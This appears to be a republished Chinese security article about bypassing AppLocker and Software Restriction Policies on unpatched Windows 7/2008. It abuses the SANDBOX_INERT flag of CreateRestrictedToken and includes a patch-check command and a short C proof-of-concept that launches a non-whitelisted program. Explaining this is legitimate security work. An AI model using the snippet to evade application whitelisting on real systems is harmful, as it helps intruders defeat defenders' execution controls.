绕过AppLocker系列之CreateRestrictedToken的利用-阿里云开发者社区

开发者社区> 开发与运维> 正文

绕过AppLocker系列之CreateRestrictedToken的利用

简介: 本文讲的是绕过AppLocker系列之CreateRestrictedToken的利用,大多数时候,绕过AppLocker都会利用可信的Microsoft二进制文件或者配置错误的策略进行代码执行,这些方法都比较简单。
本文讲的是绕过AppLocker系列之CreateRestrictedToken的利用大多数时候,绕过AppLocker都会利用可信的Microsoft二进制文件或者配置错误的策略进行代码执行,这些方法都比较简单。但是,我们还有一种通过利用架构设计的漏洞来绕过SPR或AppLocker。特别是在Windows 7和Windows 2008 Server环境中,可以滥用API函数(CreateRestrictedToken)来实现绕过。微软后来发布了一个补丁来解决这个问题。

从命令提示符可以轻易的识别出是否缺少这个补丁:

wmic.exe qfe list | findstr.exe   2532445

绕过AppLocker系列之CreateRestrictedToken的利用

AppLocker修补程序丢失

因为没有输出任何内容,所以这表示KB2532445补丁并没有安装。直接尝试执行不受信任的二进制文件就会因为AppLocker的限制而运行失败。

绕过AppLocker系列之CreateRestrictedToken的利用

有一个由Michael Bailey开发的PowerShell 脚本,它通过使用SANDBOX_INERT标志来利用API函数CreateRestrictedToken,以便可以允许执行二进制文件。由于该标志禁用了所有规则集合的检查,因此可以绕过AppLocker和软件限制策略。这个漏洞最初是由Didier Stevens发现的,并且在他的博客中进行了完整的记录。

绕过AppLocker系列之CreateRestrictedToken的利用

AppLocker Bypass – CreateRestrictedToken

为什么会发生这样的情况呢?让我们来看看 MSDN 是如何定义CreateRestrictedToken这个 API函数的。关于CreateRestrictedToken 函数的SANDBOX_INERT标志,MSDN 有如下描述:

如果使用此值,系统将不会检查AppLocker规则或应用软件限制策略。对于AppLocker,此标志将禁用所有这四个规则集的检查:可执行文件,Windows Installer,脚本和DLL。

在安装过程中创建必须运行提取的DLL的安装程序时,请在SaferComputeTokenFromLevel函数中使用SAFER_TOKEN_MAKE_INERT标志。

我写了一个小的应用程序来进行测试:

HANDLE hToken;
HANDLE hNewToken;
PROCESS_INFORMATION sPI;
STARTUPINFO sSI;
 
if (OpenProcessToken(GetCurrentProcess(), TOKEN_ALL_ACCESS, &hToken))
{
    if (CreateRestrictedToken(hToken, SANDBOX_INERT, 0, NULL, 0, NULL, 0, NULL, &hNewToken))
    {
        memset(&sSI, 0, sizeof(sSI));
        sSI.cb = sizeof(sSI);
        if (CreateProcessAsUser(hNewToken, L"c:testDialog42.exe", NULL, NULL, NULL, TRUE, 0, NULL, NULL, &sSI, &sPI))
        {
            puts("process created");
        }
}

这个程序会启动另外一个程序——Dialog42.exe,我已经使用白名单配置了SRP,但是Dialog42.exe并不在白名单列表中:

绕过AppLocker系列之CreateRestrictedToken的利用

但是,当我在我的应用程序中使用SANDBOX_INERT标志启动Dialog42.exe时,就可以正常运行。




原文发布时间为:2017年7月31日
本文作者:丝绸之路 
本文来自云栖社区合作伙伴嘶吼,了解相关信息可以关注嘶吼网站。
原文链接

版权声明:本文内容由阿里云实名注册用户自发贡献,版权归原作者所有,阿里云开发者社区不拥有其著作权,亦不承担相应法律责任。具体规则请查看《阿里云开发者社区用户服务协议》和《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容,填写侵权投诉表单进行举报,一经查实,本社区将立刻删除涉嫌侵权内容。

分享:
开发与运维
使用钉钉扫一扫加入圈子
+ 订阅

集结各类场景实战经验,助你开发运维畅行无忧

其他文章